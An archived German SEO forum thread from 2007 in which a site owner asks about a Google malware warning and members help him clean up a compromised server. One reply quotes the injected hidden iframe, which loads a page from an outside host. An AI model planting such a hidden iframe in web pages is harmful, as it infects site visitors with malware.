ABAKUS

Ihr Partner in Sachen SEO und Online Marketing
https://archiv.abakus-internet-marketing.de/foren/

Mail von Google - Malware - hä??

https://archiv.abakus-internet-marketing.de/foren/viewtopic.php?f=3&t=41416

Seite 1 von 3

Mail von Google - Malware - hä??

Verfasst: 30.04.2007, 10:37
von fo
Das hat google uns heute angetan (Platz 6)
https://www.google.de/search?hl=de&q=bo ... uche&meta=

Was soll denn das?? Hier die Mail von Google, ich verstehe nicht, was die da von uns wollen:

Dear site owner or webmaster of pro-colors.de,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):

https://www.pro-colors .de/
https://www.pro-colors .de/agb.html
https://www.pro-colors .de/kurse.html

Here is a link to a sample warning page:
https://www.google.com/interstitial?url ... colors.de/

We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser

If your site was compromised, it's important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
https://www.stopbadware.org/home/security

Once you've secured your site, you can request that the warning be
removed by visiting https://www.stopbadware.org/home/review and
requesting a review. StopBadware and Google will jointly investigate
and reply to you with our findings. If your site is no longer harmful
to users, we will remove the warning.

Sincerely,
Google Search Quality Team

Verfasst:
von

Hochwertiger Linkaufbau bei ABAKUS:
  • Google-konformer Linkaufbau
  • nachhaltiges Ranking
  • Linkbuilding Angebote zu fairen Preisen
  • internationale Backlinks
Wir bieten Beratung und Umsetzung.
Jetzt anfragen: 0511 / 300325-0

Verfasst: 30.04.2007, 10:44
von Pompom
Du hast den Expoit HTML.IframeBof auf der Seite.

Verfasst: 30.04.2007, 10:45
von fo
Was ist denn das?? Wie krieg ich den wieder runter??

Verfasst:
von

Verfasst: 30.04.2007, 10:52
von Pompom
Kennst du das da aus deinem Quellcode, und was ist das ?
<iframe src='https://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'>

Verfasst: 30.04.2007, 11:01
von fo
ne! habs eben auch ausm quelltext entfernt. aber is nu wieder drin verstehe das net!!

Verfasst: 30.04.2007, 11:03
von fo
habs gefunden stand in zwei dateien drin. hat sich da jemand eingehakt???

Verfasst: 30.04.2007, 11:05
von Pompom
Dein Server wird wohl kompromittiert sein.
Solltest mal sehen, dass du das Betriebssystem neu aufspielst, das wäre die sicherste Version.
Andere Möglichkeit wäre, dass du unserichere Scripts installiert hast, die es erlauben, externen Code auszuführen.

Vielleicht hilft ein Logcheck weiter.

Verfasst: 30.04.2007, 11:09
von ole1210
Da vermute ich mal, das irgendwas bei dir nicht sicher ist.

Falsche Rechte gesetzt, oder irgendwer anders der bei dir mit aufms Server liegt hat unsicher Scripte, oder der ganze Server ist komisch programmiert, oder du hast unsichere Scripte im Einsatz etc.

Gibbet viele Möglichkeiten. Solltest du aber auf jeden fall mal wen ranlassen, der davon Ahnung hat.

An welche Adresse wurde die eMail gesendet? info@, webmaster@ ??

Verfasst: 30.04.2007, 11:14
von ts
Alle Passwörter ändern :wink:

Verfasst: 30.04.2007, 11:17
von fo
also das war auf zwei seiten von vielen, die wir auf dem server laufen haben, jedoch unterscheiden die sich vom system her grundlegend (eines ist joomla, das andere selbstprogrammiert).

geil, wenn der server kompromittiert ist, darf ich alles neu machen. super, man hat ja sonst nix zu tun.

Verfasst: 30.04.2007, 11:19
von lloy
Wenns ein eigener Server oder VServer ist, tu der Welt und Dir einen Gefallen und setz ihn komplett neu auf. :wink:

Passwörter ändern reicht nicht. Wenn jemand das Teil als Spamschleuder missbraucht kanns richtig teuer werden.

Edit: Joomla ist in letzter Zeit teilweise durch viele Sicherheitslücken aufgefallen.

Verfasst: 30.04.2007, 11:19
von Pompom
Ich weiss nicht, welche joomla-Version du drauf hast, es gab einige (viele?) die strotzten vor Sicherheitslücken.

Verfasst: 30.04.2007, 11:25
von ole1210
Einige? Viele? ALLE!!!

Verfasst: 30.04.2007, 11:31
von fi-ausbilden
... doch lieber TYPO3 machen :-) ...

Verfasst: 30.04.2007, 11:37
von fo
ohje minee.. kann aber nicht alle system umstellen. wir haben da einen root server laufen, system neu aufsetzen übersteigt aber unseren kenntnisstand. meint ihr ein managed server würde evtl. helfen?
Alle Zeiten sind UTC+01:00
Seite 1 von 3

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de